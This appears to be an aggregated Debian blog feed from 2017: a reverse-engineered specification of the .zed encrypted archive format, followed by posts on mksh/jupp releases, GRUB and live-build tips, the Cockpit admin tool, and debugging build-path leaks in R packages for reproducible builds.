uint64le: unsigned int on 8 bytes, little endian.
uchar: unsigned char on 1 byte.
(hexadecimal): represents 1 byte with 2 hexadecimal numbers.
e.g. 4142 (hexadecimal) means decimal values 65 and then 66.
(ascii): represents 1 byte with the matching 1-byte ASCII value.
e.g. 'AB\0' means decimal values 65 then 66 and then 0.
UTF-16LE: text encoded using 2-bytes Unicode, little-endian, without Byte Order Mark (BOM), as commonly used under MS Windows.
IV: initialization vector for AES encryption and decryption.
CBC: Cipher Block Chaining, see Recommendation for Block Cipher Modes of Operation and Wikipedia.
CTS: CipherText Stealing, one type of end-of-stream handling, see Recommendation for Block Cipher Modes of Operation: Three Variants of Ciphertext Stealing for CBC Mode and Wikipedia.
PBA, PBE: password-based authentication, password-based encryption; see PKCS #11 Cryptographic Token Interface Current Mechanisms Specification.
MS-CFB: Compound File Binary Format, documented at MSDN, libolecf, Wikipedia.
Libraries that can manipulate this format include olefile, libolecf and libforensics.
MS-OLEPS: OLE Property Set, documented at MSDN and libfole.
The 'oleps.py' demo from libforensics displays detailed information on MS-OLEPS streams; olefile and libolecf have basic support.
TLV : Type-Length-Value encoding ; 4 bytes for type, 4 bytes for length (uint32be), and a variable-sized value; see Type-length-value at Wikipedia for the general principle.
FILETIME: timestamp as 1/10000000s since January 1, 1601 (UTC), see FILETIME structure at MSDN.

Feedback Feel free to send comments at beuc@beuc.net. If you have .zed files that you think are not covered by this document, please send them as well (replace sensitive files with other ones). The author's GPG key can be found at 8FF1CB6E8D89059F. Copyright (C) 2017 Sylvain Beucler Copying and distribution of this file, with or without modification, are permitted in any medium without royalty provided the copyright notice and this notice are preserved. This file is offered as-is, without any warranty.

Sylvain Beucler: dot-zed archive file format

TL,DR: I reverse-engineered the .zed encrypted archive format.
Following a clean-room design, I'm providing a description that can be implemented by a third-party.
Interested?

The main container is using the (MS-CFB), which is notably used by MS Office 97-2003 .doc files. It contains several streams:
- Metadata stream: in OLE Property Set format (MS-OLEPS), contains 2 blobs in a specific Type-Length-Value (TLV) format:
  - _ctlfile: global archive properties and access list
    It is obfuscated by means of static-key AES encryption.
    The properties include archive initial filename and a global IV.
    A global encryption key is itself encrypted in each user entry.
  - _catalog: file list
    Contains each file metadata indexed with a 15-bytes identifier.
    Directories are supported.
    Full filename is encrypted using AES.
    File extension is (redundantly) stored in clear, and so are file metadata such as modification time.
- Each file in the archive compressed with zlib and encrypted with the standard AES algorithm, in a separate stream.
  Several encryption schemes and key sizes are supported.
  The file stream is split in chunks of 512 bytes, individually encrypted.
- Optional streams, contain additional metadata as well as pictures to display in the application background ("watermarks"). They are not discussed here.

Or as a diagram:

+----------------------------------------------------------------------------------------------------+
  .zed archive (MS-CBF)                                                                               
                                                                                                      
   stream #1                         stream #2                       stream #3...                     
  +------------------------------+  +---------------------------+  +---------------------------+      
    metadata (MS-OLEPS)               encryption (AES)               encryption (AES)                 
                                      512-bytes chunks               512-bytes chunks                 
    +--------------------------+                                                                      
      obfuscation (static key)        +-----------------------+      +-----------------------+        
      +----------------------+       -  compression (zlib)     -    -  compression (zlib)     -       
       _ctlfile (TLV)                                                                            ...  
      +----------------------+          +---------------+              +---------------+               
    +--------------------------+          file contents                  file contents                
                                                                                                      
    +--------------------------+     -  +---------------+      -    -  +---------------+      -       
      _catalog (TLV)                                                                                  
    +--------------------------+      +-----------------------+      +-----------------------+        
  +------------------------------+  +---------------------------+  +---------------------------+      
+----------------------------------------------------------------------------------------------------+

obfuscated metadata encrypted with static AES key
filenames and files in archives with 'encryption_mode' set to "AES-CBC-STREAM"
any AES ciphertext of size < 16 bytes, regardless of encryption mode

the second-to-last block of the ciphertext is encrypted in AES-ECB mode (i.e. block cipher encryption only, without XORing with the IV)
then XOR-ed with the last partial block (hence truncated to the length of the partial block)

filenames and files in archives with 'encryption_mode' set to "AES-CBC-CTS".
- exception: if the size of the ciphertext is < 16 bytes, then "STREAM" is used instead.

static delimiter 0765921A2A0774534752073361719300 (hexadecimal) followed by 0100 (hexadecimal) (18 bytes total)
16-byte IV
ciphertext
1 uint32be representing the length of all the above
static delimiter 0765921A2A0774534752073361719300 (hexadecimal) followed by "ZoneCentral (R)" (ASCII) and a NUL byte (32 bytes total)

global archive properties as a 'fileprops' structure,
extra archive properties as a 'archive_extraprops' structure
users access list as a series of 'passworduser' and 'rsauser entries.

4 bytes for Type (specified as a 4-bytes hexadecimal below)
4 bytes for value Length (uint32be)
Value

80110600: fileprops, used for the file list as well as for the global archive properties
001b0600: archive_extraprops
80140600: accesslist

Some additional unidentified types may be present. _ctlfile TLV

80110600: fileprops (TLV structure): global archive properties
- 00230400: archive_pathname (UTF-16LE string): initial archive filename (past versions also leaked the full pathname of the initial archive)
- 80270200: encryption_mode (utf32be): 103 for "AES-CBC-STREAM", 104 for "AES-CBC-CTS"
- 80260200: encryption_strength (utf32be): AES key size, in bytes (e.g. 32 means AES with a 256-bit key)
- 80280500: files_iv (sequence of bytes): global IV for all filenames and file contents
001b0600: archive_extraprops (TLV structure): additionnal archive properties (optional)
- 00c40500: archive_creationtime (FILETIME): date and time when archive was initially created (optional)
- 00c00400: archive_createdwith (UTF-16LE string): uuid-like structure describing the application that initialized the archive (optional)
  00000188-1000-3CA8-8868-36F59DEFD14D is Zed! Free 1.0.188.
80140600: accesslist (TLV structure): describe the users, their key encryption and their permissions
- 80610600: passworduser (TLV structure): user identified by password (0 or more)
- 80620600: rsauser (TLV structure): user identified by RSA key (via file or PKCS#11 token) (0 or more)
- Fields common to passworduser and rsauser:
  - 80710400: login (UTF-16LE string): user name
  - 80720300: login_md5 (sequence of bytes): used by the application to search for a user name
  - 807e0100: priv1 (uchar): user privileges; present and set to 1 when user is admin (optional)
  - 00830200: priv2 (uint32be): user privileges; present and set to 2 when user is admin, present and set to 5 when user is a marked as mandatory, e.g. for recovery keys (optional)
  - 80740500: files_key_ciphertext (sequence of bytes): the archive encryption key, itself encrypted
  - 00840500: user_creationtime (FILETIME): date and time when the user was added to the archive
- passworduser-specific fields:
  - 80760500: pbe_salt (sequence of bytes): salt for PBE
  - 80770200: pbe_iter (uint32be): number of iterations for PBE
  - 80780200: pkcs12_hashfunc (uint32be): hash function used for PBE and PBA key derivation
  - 80790500: pba_checksum (sequence of bytes): password derived with PBA to check for password validity
  - 807a0500: pba_salt (sequence of bytes): salt for PBA
  - 807b0200: pba_iter (uint32be): number of iterations for PBA
- rsauser-specific fields:
  - 807d0500: certificate (sequence of bytes): user X509 certificate in DER format

_catalog TLV

80110600: fileprops (TLV structure): describe the archive files (0 or more)
- 80300500: file_id (sequence of bytes): a 16-byte unique identifier
- 80310400: filename_halfanon (UTF-16LE string): half-anonymized filename, e.g. File1.txt (leaking filename extension)
- 00380500: filename_ciphertext (sequence of bytes): encrypted filename; may have a trailing NUL byte once decrypted
- 80330500: file_size (uint64le): decompressed file size in bytes
- 80340500: file_creationtime (FILETIME): file creation date and time
- 80350500: file_lastwritetime (FILETIME): file last modification date and time
- 80360500: file_lastaccesstime (FILETIME): file last access date and time
- 00370500: parent_directory_id (sequence of bytes): file_id of the parent directory, 0 is top-level
- 80320100: is_dir (uint32be): 1 if entry is directory (optional)

21: SHA-1
22: SHA-256

PBA - Password-based authentication The user accessing the archive will be authenticated by deriving an 8-byte sequence from his/her password. The parameters for the derivation function are:

ID: 3
'pba_salt': the salt, typically an 8-byte random sequence
'pba_iter': the iteration count, typically 200000

'pbe_salt': the salt, typically an 8-bytes random sequence
'pbe_iter': the iteration count, typically 100000

The parameters specific to user key are:

ID: 1
size: 32

The user key needs to be truncated to a length of 'encryption_strength', as specified in bytes in the archive properties. The parameters specific to user IV are:

ID: 2
size: 16

Initial  offset: 0 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15
Shuffled offset: 3 2 1 0 5 4 7 6 8 9 10 11 12 13 14 15

expressing the current chunk number as little endian on 16 bytes
XORing it with the global IV
encrypting with the global AES key in ECB mode (without IV).

uint32le: unsigned int on 4 bytes, little endian.
uint32be: unsigned int on 4 bytes, big endian.
uint64le: unsigned int on 8 bytes, little endian.
uchar: unsigned char on 1 byte.
(hexadecimal): represents 1 byte with 2 hexadecimal numbers.
e.g. 4142 (hexadecimal) means decimal values 65 and then 66.
(ascii): represents 1 byte with the matching 1-byte ASCII value.
e.g. 'AB\0' means decimal values 65 then 66 and then 0.
UTF-16LE: text encoded using 2-bytes Unicode, little-endian, without Byte Order Mark (BOM), as commonly used under MS Windows.
IV: initialization vector for AES encryption and decryption.
CBC: Cipher Block Chaining, see Recommendation for Block Cipher Modes of Operation and Wikipedia.
CTS: CipherText Stealing, one type of end-of-stream handling, see Recommendation for Block Cipher Modes of Operation: Three Variants of Ciphertext Stealing for CBC Mode and Wikipedia.
PBA, PBE: password-based authentication, password-based encryption; see PKCS #11 Cryptographic Token Interface Current Mechanisms Specification.
MS-CFB: Compound File Binary Format, documented at MSDN, libolecf, Wikipedia.
Libraries that can manipulate this format include olefile, libolecf and libforensics.
MS-OLEPS: OLE Property Set, documented at MSDN and libfole.
The 'oleps.py' demo from libforensics displays detailed information on MS-OLEPS streams; olefile and libolecf have basic support.
TLV : Type-Length-Value encoding ; 4 bytes for type, 4 bytes for length (uint32be), and a variable-sized value; see Type-length-value at Wikipedia for the general principle.
FILETIME: timestamp as 1/10000000s since January 1, 1601 (UTC), see FILETIME structure at MSDN.

10 August 2017

Thorsten Glaser: New mksh and jupp releases, mksh FAQ, jupprc for JOE 4.4; MuseScore

mksh R56 was released with experimental fixes for the history no longer persisted when HISTFILE near-full and interactive shell cannot wait on coprocess by PID issues (I hope they do not introduce any regressioins) and otherwise as a bugfix release. You might wish to know the $EDITOR selection mechanism in dot.mkshrc changed. Some more alias characters are allowed again, and POSIX character classes (for ASCII, and EBCDIC, only) appeared by popular vote. mksh now has a FAQ; enjoy. Do feel free to contribute (answers, too, of course). The jupp text editor has also received a new release; asides from being much smaller, and updated (mksh too, btw) to Unicode 10, and some segfault fixes, it features falling back to using /dev/tty if stdin or stdout is not a terminal (for use on GNU with find xargs jupp, since they don t have our xargs(1) -o option yet), a new command to exit nonzero (sometimes, utilities invoking the generic visual editor need this), and presentation mode . Presentation mode, crediting Natureshadow, is basically putting your slides as (UTF-8, with fancy stuff inside) plaintext files into one directory, with sorting names (so e.g. zero-padded slide numbers as filenames), presenting them with jupp * in a fullscreen xterm. You d hit F6 to switch to one-file view first, then present by using F8 to go forward (F7 to go backward), and, for demonstrations, F9 to pipe the entire slide through an external command (could be just sh ) offering the previous one as default. Simple yet powerful; I imagine Sven Guckes would love it, were he not such a vim user. The new release is offered as source tarball (as usual) and in distribution packages, but also, again, a Win32 version as PKZIP archive (right-click on setup.inf and hit I nstall to install it). Note that this comes with its own (thankfully local) version of the Cygwin32 library (compatible down to Windows 95, apparently), so if you have Cygwin installed yourself you re better off compiling it there and using your own version instead. I ve also released a new DOS version of 2.8 with no code patches but an updated jupprc; the binary (self-extracting LHarc archive) this time comes with all resource files, not just jupp s. Today, the jupprc drop-in file for JOE 3.7 got a matching update (and some fixes for bugs discovered during that) and I added a new one for JOE 4.4 (the former being in Debian wheezy, the latter in jessie, stretch and buster/sid). It s a bit rudimentary (the new shell window functionality is absent) but, mostly, gives the desired jupp feeling, more so than just using stock jstar would.

source tarballs
Win32 binaries
DOS binaries
drop-in jupprc for JOE 2.8, or to update jupp 2.8
drop-in jupprc for JOE 3.7
drop-in jupprc for JOE 4.4

CVS ability to commit to multiple branches of a file at the same time, therefore grouping the commit (by commitid at least, unsure if cvsps et al. can be persuaded to recognise it). If you don t know what cvs(GNU) is: it is a proper (although not distributed) version control system and the best for centralised tasks. (For decentral tasks, abusing git as pseudo-VCS has won by popularity vote; take this as a comparison.) If desired, I can make these new versions available in my WTF APT repository on request. (Debian buster/sid users: please change https to http there, the site is only available with TLSv1.0 as it doesn t require bank-level security.) I d welcome it very much if people using an OS which does not yet carry either to package it there. Message me when one more is added, too In unrelated news I uploaded MuseScore 2.1 to Debian unstable, mostly because the maintainers are busy (though I could comaintain it if needed, I d just need help with the C++ and CMake details). Bonus side effect is that I can now build 2.2~ test versions with patches of mine added I plan to produce to fix some issues (and submit upstream) (read more )

31 May 2017

Enrico Zini: Today I Learnt

Build a system that can install GRUB2 on UEFI and on legacy systems grub-efi-amd64 and grub-pc are not coinstallable. It turns out however that they do not contain GRUB, but the machinery to keep GRUB configuration up to date on the current system. If I want to be able to install GRUB on other systems, I can use the -bin packages:

apt install grub-common grub2-common grub-efi-amd64-bin grub-pc-bin

That gave me a grub-install command that worked on both kinds of systems. GRUB configuration on a UEFI system An old GRUB configuration on a UEFI system gave me this:

error: no suitable mode found
Booting blind

which boots on a blank screen until the kernel reinitialises the video hardware. The Arch Linux Wiki has excellent documentation for this case, and here's the resulting UEFI GRUB snippet:

insmod efi_gop
insmod efi_uga
insmod font
if loadfont $ prefix /fonts/unicode.pf2
then
    insmod gfxterm
    set gfxmode=auto
    set gfxpayload=keep
    terminal_output gfxterm
fi
# Follow with the usual GRUB menu entries

Use an unsigned local APT repository for testing/development purposes I found out today that one can have options in square brackets in sources.list:

# In /etc/apt/sources.list.d/local-devel.list
deb [trusted=yes] http://localhost:1234/debian jessie main

pabs on IRC also mentioned local-apt-repository but I haven't tried it. Booting Jessie Debian Live with a kernel from jessie-backports This requires working around #844749 and 844749. In hooks/9000-fix-bugs.chroot I ended up having this:

# Workaround per https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=844749
if ! grep -q ^nls_ascii /etc/initramfs-tools/modules
then
        echo "nls_ascii" >> /etc/initramfs-tools/modules
fi
# Workaround per https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=844749
if ! grep -q ^overlay /etc/initramfs-tools/modules
then
        echo "overlay" >> /etc/initramfs-tools/modules
fi

Using a custom kernel in Jessie Debian Live How do I have live-build pick a custom kernel package instead of the default one?

lb config --linux-packages linux-image-$SOMETHING
Use equivs to build a linux-image-$SOMETHING-$ARCH package that depends on the kernel that you built.

9 May 2017

Martin Pitt: Cockpit is now just an apt install away

Cockpit has now been in Debian unstable and Ubuntu 17.04 and devel, which means it s now a simple

$ sudo apt install cockpit

away for you to try and use. This metapackage pulls in the most common plugins, which are currently NetworkManager and udisks/storaged. If you want/need, you can also install cockpit-docker (if you grab docker.io from jessie-backports or use Ubuntu) or cockpit-machines to administer VMs through libvirt. Cockpit upstream also has a rather comprehensive Kubernetes/Openstack plugin, but this isn t currently packaged for Debian/Ubuntu as kubernetes itself is not yet in Debian testing or Ubuntu. After that, point your browser to https://localhost:9090 (or the host name/IP where you installed it) and off you go.

What is Cockpit? Think of it as an equivalent of a desktop (like GNOME or KDE) for configuring, maintaining, and interacting with servers. It is a web service that lets you log into your local or a remote (through ssh) machine using normal credentials (PAM user/password or SSH keys) and then starts a normal login session just as gdm, ssh, or the classic VT logins would. The left side bar is the equivalent of a task switcher , and the applications (i. e. modules for administering various aspects of your server) are run in parallel. The main idea of Cockpit is that it should not behave special in any way - it does not have any specific configuration files or state keeping and uses the same Operating System APIs and privileges like you would on the command line (such as `lvmconfig`, the `org.freedesktop.UDisks2` D-Bus interface, reading/writing the native config files, and using `sudo` when necessary). You can simultaneously change stuff in Cockpit and in a shell, and Cockpit will instantly react to changes in the OS, e. g. if you create a new LVM PV or a network device gets added. This makes it fundamentally different to projects like webmin or ebox, which basically own your computer once you use them the first time. It is an interface for your operating system, which even reflects in the branding: as you see above, this is Debian (or Ubuntu, or Fedora, or wherever you run it on), not Cockpit .

Remote machines In your home or small office you often have more than one machine to maintain. You can install `cockpit-bridge` and `cockpit-system` on those for the most basic functionality, configure SSH on them, and then add them on the Dashboard (I add a Fedora 26 machine here) and from then on can switch between them on the top left, and everything works and feels exactly the same, including using the terminal widget: The Fedora 26 machine has some more Cockpit modules installed, including a lot of playground ones, thus you see a lot more menu entries there.

Under the hood Beneath the fancy Patternfly/React/JavaScript user interface is the Cockpit API and protocol, which particularly fascinates me as a developer as that is what makes Cockpit so generic, reactive, and extensible. This API connects the worlds of the web, which speaks IPs and host names, ports, and JSON, to the local host only world of operating systems which speak D-Bus, command line programs, configuration files, and even use fancy techniques like passing file descriptors through Unix sockets. In an ideal world, all Operating System APIs would be remotable by themselves, but they aren t. This is where the cockpit bridge comes into play. It is a JSON (i. e. ASCII text) stream protocol that can control arbitrarily many channels to the target machine for reading, writing, and getting notifications. There are channel types for running programs, making D-Bus calls, reading/writing files, getting notified about file changes, and so on. Of course every channel can also act on a remote machine. One can play with this protocol directly. E. g. this opens a (local) D-Bus channel named d1 and gets a property from systemd s hostnamed:

$ cockpit-bridge --interact=---
  "command": "open", "channel": "d1", "payload": "dbus-json3", "name": "org.freedesktop.hostname1"  
---
d1
  "call": [ "/org/freedesktop/hostname1", "org.freedesktop.DBus.Properties", "Get",
          [ "org.freedesktop.hostname1", "StaticHostname" ] ],
  "id": "hostname-prop"  
---

and it will reply with something like

d1
 "reply":[[ "t":"s","v":"donald" ]],"id":"hostname-prop" 
---

( donald is my laptop s name). By adding additional parameters like host and passing credentials these can also be run remotely through logging in via ssh and running cockpit-bridge on the remote host. Stef Walter explains this in detail in a blog post about Web Access to System APIs. Of course Cockpit plugins (both internal and third-party) don t directly speak this, but use a nice JavaScript API. As a simple example how to create your own Cockpit plugin that uses this API you can look at my schroot plugin proof of concept which I hacked together at DevConf.cz in about an hour during the Cockpit workshop. Note that I never before wrote any JavaScript and I didn t put any effort into design whatsoever, but it does work .

Next steps Cockpit aims at servers and getting third-party plugins for talking to your favourite part of the system, which means we really want it to be available in Debian testing and stable, and Ubuntu LTS. Our CI runs integration tests on all of these, so each and every change that goes in is certified to work on Debian 8 (jessie) and Ubuntu 16.04 LTS, for example. But I d like to replace the external PPA/repository on the Install instructions with just it s readily available in -backports ! Unfortunately there s some procedural blockers there, the Ubuntu backport request suffers from understaffing, and the Debian stable backport is blocked on getting it in to testing first, which in turn is blocked by the freeze. I will soon ask for a freeze exception into testing, after all it s just about zero risk - it s a new leaf package in testing. Have fun playing around with it, and please report bugs! Feel free to discuss and ask questions on the Google+ post.

3 May 2017

Reproducible builds folks: Reproducing R packages

In the past couple of weeks, Ximin Luo worked on making R generate reproducible output. This is now mostly complete, and we're waiting on feedback from upstream about our patch. In the meantime, there are a few packages that remain unreproducible, but the issue probably lies in those specific packages rather than the R toolchain. Perhaps you can help out with them, after reading this!

R packages compile into a .rdb database format that contains the package's definitions, plus a .rdx index file for easy lookup in the .rdb file. Usually, there is a main rdb with the package contents, plus another rdb that stores the help data. There is also a paths.rds (same format as .rdx) that contains some more stuff. One can actually read these files by hand using Rscript, see the diffoscope code in rdata.py. If you run that, you can see that path.rds contains some obvious paths, but the other files contain less obvious stuff, and in fact these scripts give identical output for the .rdb files, even though they are bitwise different. To get to the bottom of this, we'll have to use the R debugger. Attached to this post is a script that smooths this process. I ran this against Debian's R packages, but it probably also works with other distros' R packages - try it and see. You run it like ./r-mini-repro-test.sh $pkgdir $builddir and it will output some hashes for you; make sure to install the build dependencies first. You should manually vary both $pkgdir and $builddir to introduce the build-path variations; $builddir can be an arbitrary string but $pkgdir should point to the actual R package's source directory, so I just copy that to two locations and point the script at each of them in turn. Now, we can begin debugging. Before I did this, we had 478 unreproducible R packages so the biggest problem was likely with R itself. I downloaded the source code of both R and a small example package (r-cran-tensor), then figured out how the R packages were actually being built. This resulted in me writing the script above, to speed up debugging. You can read about R's debugger here (no HTTPS), it's a bit primitive but it supports the basic stuff (step, continue, where, print/eval) and that was adequate for me. Debugging R core So let's take a small example with Debian R 3.4.0-1:

$ ../r-mini-repro-test.sh r-cran-tensor-1.5 123
[..]
* installing *source* package  tensor  ...
** package  tensor  successfully unpacked and MD5 sums checked
** R
** preparing package for lazy loading
** help
*** installing help indices
** building package indices
** testing if installed package can be loaded
* DONE (tensor)
[..]
c71a766429151a13e46039f3c37a14edc704004f410c34f8f37a2f098506421d  ./debian/123/usr/lib/R/site-library/tensor/R/tensor.rdx
736b5b4a885db71fb3fe2a538faeefe43c500c4080dbf2c75b97135b98401acd  ./debian/123/usr/lib/R/site-library/tensor/R/tensor.rdb
8a3f9616de7ee78a83b07395dd6ec43c5259d3f1b1b653d397808fc9fc5d96c2  ./debian/123/usr/lib/R/site-library/tensor/help/tensor.rdx
d1ac634987b24606a5da627ec073f45edce2bddf071391dd17c246a0a01eba63  ./debian/123/usr/lib/R/site-library/tensor/help/tensor.rdb
80796cc1a2cfcac40c394153f67617d575e103a405430b8483c2261a903db046  ./debian/123/usr/lib/R/site-library/tensor/help/paths.rds
$ ../r-mini-repro-test.sh r-cran-tensor-1.5 1234
[..]
5f081f4d6f9da1fbe06e374067e6636d926de4cdf09886058b15c5928c636c0d  ./debian/1234/usr/lib/R/site-library/tensor/R/tensor.rdx
7145669891e1b766ca0d8d89fa9c317af716e61a62650abe3a11a848240f1d57  ./debian/1234/usr/lib/R/site-library/tensor/R/tensor.rdb
8a3f9616de7ee78a83b07395dd6ec43c5259d3f1b1b653d397808fc9fc5d96c2  ./debian/1234/usr/lib/R/site-library/tensor/help/tensor.rdx
d1ac634987b24606a5da627ec073f45edce2bddf071391dd17c246a0a01eba63  ./debian/1234/usr/lib/R/site-library/tensor/help/tensor.rdb
80796cc1a2cfcac40c394153f67617d575e103a405430b8483c2261a903db046  ./debian/1234/usr/lib/R/site-library/tensor/help/paths.rds

The files are created by the ** preparing package for lazy loading and

**
help

steps. In retrospect this seems somewhat obvious from the output, but I had never done R before so I spent a while using strace to be sure; one can see that those files are indeed written to after those strings are printed. Then we can grep the R source code for these strings.

r-base-3.4.0$ grep -Ri "preparing package for lazy loading" src
src/library/tools/R/install.R:                starsmsg(stars, "preparing package for lazy loading")

Reading the file, we see that this happens in the tools:::.install_packages function, and reading it further we see that it calls makeLazyLoading then code2LazyLoadDB then makeLazyLoadDB. Seems promising, let's confirm it before chasing potential wild geese. Important: In the rest of these command-line outputs I'll prepend what I input with >>> but this doesn't actually get printed by Rscript. So don't be surprised that you don't see these, when you're trying to recreate my steps. Also I am a total R noob so possibly there are more elegant ways to do what I'm about to show you; this is what I came up with after 2-3 hours of research.

$ DEBUG=1 ../r-mini-repro-test.sh r-cran-tensor-1.5 123
enter (some or all of) the following into R:
[.. helpful commands ..]
+ R_DEFAULT_PACKAGES= LC_COLLATE=C /usr/lib/R/bin/R --no-restore --slave --args nextArg-lnextArgdebian/123/usr/lib/R/site-librarynextArg-dnextArg.nextArg--built-timestamp="Thu, 01 Jan 1970 00:00:00 +0000"
>>> debug(tools:::makeLazyLoadDB)
>>> tools:::.install_packages()
processing  . 
[..]
** preparing package for lazy loading
debugging in: makeLazyLoadDB(ns, dbbase, compress = compress)
debug:  
[.. source code of makeLazyLoadDB, not yet run ..]

OK so we just entered the function and it's paused, in a separate shell let's check what it's doing:

$ find r-cran-tensor-1.5 -name '*.rdb'
[ no output ]

So, no files have been written yet, which means none of the parent functions did anything, we are in the right function (or it's in a child). If we continue the function, we get:

>>> c
exiting from: makeLazyLoadDB(ns, dbbase, compress = compress)
** help
debugging in: makeLazyLoadDB(db, file.path(manOutDir, basename(outDir)))
debug:  
[.. source code of makeLazyLoadDB, not yet run ..]
 
$ find r-cran-tensor-1.5 -name '*.rdb'
r-cran-tensor-1.5/debian/123/usr/lib/R/site-library/tensor/R/tensor.rdb

Then continuing again:

>>> c
exiting from: makeLazyLoadDB(db, file.path(manOutDir, basename(outDir)))
*** installing help indices
** building package indices
** testing if installed package can be loaded
* DONE (tensor)
$ find r-cran-tensor-1.5 -name '*.rdb'
r-cran-tensor-1.5/debian/123/usr/lib/R/site-library/tensor/help/tensor.rdb
r-cran-tensor-1.5/debian/123/usr/lib/R/site-library/tensor/R/tensor.rdb

So it seems likely this function is the correct one. After reading the source code of makeLazyLoadDB, even though I don't understand the whole thing, it looks like possibly this part is the one that does the actual writing:

    for (i in seq_along(vars))  
        key <- if (is.null(from)   is.environment(from))
            lazyLoadDBinsertVariable(vars[i], from, datafile,
                                     ascii, compress,  envhook)
        else lazyLoadDBinsertListElement(from, i, datafile, ascii,
                                         compress, envhook)
        assign(vars[i], key, envir = varenv)

So let's step through it and see if the data contains any paths.

$ DEBUG=1 ../r-mini-repro-test.sh r-cran-tensor-1.5 123
[..]
>>> debug(tools:::makeLazyLoadDB)
>>> tools:::.install_packages()
processing  . 
[..]
** preparing package for lazy loading
debugging in: makeLazyLoadDB(ns, dbbase, compress = compress)
debug:  
[.. source code of makeLazyLoadDB, not yet run ..]
 
>>>                                                                             # pressing <Enter> just means "step"
debug: ascii <- as.logical(ascii)                                               # this is the first line of the function
>>>                                                                             # keep stepping
[..]
>>>
debug: for (i in seq_along(vars))  
[.. source code of the inside of the block, not yet run ..]
 
>>>
debug: key <- if (is.null(from)   is.environment(from)) lazyLoadDBinsertVariable(vars[i],
    from, datafile, ascii, compress, envhook) else lazyLoadDBinsertListElement(from,
    i, datafile, ascii, compress, envhook)
>>>
debug: lazyLoadDBinsertVariable(vars[i], from, datafile, ascii, compress,
    envhook)                                                                    # not yet run

If we look at the source code we see that it will try to insert the value of .Internal(getVarsFromFrame(vars[i], from, FALSE))[[1L]] into the file, so let's evaluate it:

>>> .Internal(getVarsFromFrame(vars[i], from, FALSE))[[1L]]
function (x, y)
tensor(x, y, 2, 2)
<environment: namespace:tensor>
>>> typeof(.Internal(getVarsFromFrame(vars[i], from, FALSE))[[1L]])
[1] "closure"
>>> environment(.Internal(getVarsFromFrame(vars[i], from, FALSE))[[1L]])        # get the environment of a closure
<environment: namespace:tensor>
>>> envlist(environment(.Internal(getVarsFromFrame(vars[i], from, FALSE))[[1L]])) # environment as an envlist, more detailed output
$ %*t% 
function (x, y)
tensor(x, y, 2, 2)
<environment: namespace:tensor>
$ %t*% 
function (x, y)
tensor(x, y, 1, 1)
<environment: namespace:tensor>
$ %t*t% 
function (x, y)
tensor(x, y, 1, 2)
<environment: namespace:tensor>
$.__NAMESPACE__.
<environment: 0x55eb55d00be0>
$.__S3MethodsTable__.
<environment: 0x55eb55d166e8>
$.packageName
[1] "tensor"
$tensor
function (A, B, alongA = integer(0), alongB = integer(0))
 
[.. function definition ..]
 
<environment: namespace:tensor>

Nothing obviously containing paths so far, let's keep stepping and dumping the objects

>>>
debug: assign(vars[i], key, envir = varenv)
>>>                                                                             # next iteration now
debug: key <- if (is.null(from)   is.environment(from)) lazyLoadDBinsertVariable(vars[i],
    from, datafile, ascii, compress, envhook) else lazyLoadDBinsertListElement(from,
    i, datafile, ascii, compress, envhook)
>>>
debug: lazyLoadDBinsertVariable(vars[i], from, datafile, ascii, compress,
    envhook)
>>> .Internal(getVarsFromFrame(vars[i], from, FALSE))[[1L]]
function (x, y)
tensor(x, y, 1, 1)
<environment: namespace:tensor>
>>>
[.. more stepping ..]
debug: lazyLoadDBinsertVariable(vars[i], from, datafile, ascii, compress,
    envhook)
>>> .Internal(getVarsFromFrame(vars[i], from, FALSE))[[1L]]
<environment: 0x55eb55d00be0>
>>> envlist(.Internal(getVarsFromFrame(vars[i], from, FALSE))[[1L]])
$S3methods
     [,1] [,2] [,3]
$dynlibs
NULL
$exports
<environment: 0x55eb55d0a4f8>
$imports
$imports$base
[1] TRUE
$lazydata
<environment: 0x55eb55d0a178>
attr(,"name")
[1] "lazydata:tensor"
$path
[1] "/mystupidbuildpath/r-tests/r-cran-tensor-1.5/debian/123/usr/lib/R/site-library/tensor"
$spec
    name  version
"tensor"    "1.5"

Oh, here we go. (In fact we could have got this earlier, it was part of the .__NAMESPACE__. key of the first environment that we examined.) Naturally, you'll sometimes miss stuff, and sometimes go down dead ends when doing something like this, perseverence is important. The names are also a hint, after grepping the R source code for names like "S3methods" and "lazydata" we see that src/library/base/R/namespace.R is the only one that contains all of them, then reading that code in more depth reveals this. After patching it, rebuilding r-base, installing this patched version, then running our tests again, we see that we've eliminated differences in the main rdb file but not the help rdb file.

In fact, after some more time stepping through the loop repeatedly and printing out all the objects, nothing obvious shows up. Time to re-read the source code of makeLazyLoadDB. We notice that all the lazyLoadDBinsert* functions have a hook parameter that we haven't been stepping through because it's in a separate function. So let's do that. Since it's an inner function, one has to call debug() inside makeLazyLoadDB:

$ DEBUG=1 ../r-mini-repro-test.sh r-cran-tensor-1.5 123
[..]
>>> debug(tools:::makeLazyLoadDB)
>>> tools:::.install_packages()
processing  . 
[..]
** preparing package for lazy loading
debugging in: makeLazyLoadDB(ns, dbbase, compress = compress)
debug:  
[.. source code of makeLazyLoadDB, not yet run ..]
 
>>> c
exiting from: makeLazyLoadDB(ns, dbbase, compress = compress)
** help
debugging in: makeLazyLoadDB(db, file.path(manOutDir, basename(outDir)))
debug:  
[.. source code of makeLazyLoadDB, not yet run ..]
 
[.. stepping through the function ..]
debug: envhook <- function(e)  
[.. function definition ..]
 
>>>                                                                             # step next, to define that function
[.. next statement, we don't care about it ..]
>>> debug(envhook)
[.. then keep stepping through makeLazyLoadDB ..]
>>>
debug: lazyLoadDBinsertVariable(vars[i], from, datafile, ascii, compress,
    envhook)
[.. then keep stepping through makeLazyLoadDB ..]
debug: lazyLoadDBinsertVariable(vars[i], from, datafile, ascii, compress,
    envhook)
[.. hook wasn't run for these previous iterations for some reason, but keep stepping ..]
[.. eventually we get ..]
debugging in: (function (e)
 
[.. function definition ..]
 )(<environment>)                                                               # "(..)(<environment>)" is R's name for that function (actually a closure)
debug:  
[.. source code, not yet run ..]
 
>>> e
/mystupidbuildpath/r-tests/r-cran-tensor-1.5/man/tensor.Rd
>>> typeof(e)
[1] "environment"
>>> envlist(e)
$Enc
[1] "UTF-8"
$encoding
[1] ""
$filename
[1] "/mystupidbuildpath/r-tests/r-cran-tensor-1.5/man/tensor.Rd"
$timestamp
[1] "2002-01-16 11:51:14 CET"
$wd
[1] "/mystupidbuildpath/r-tests/r-cran-tensor-1.5"

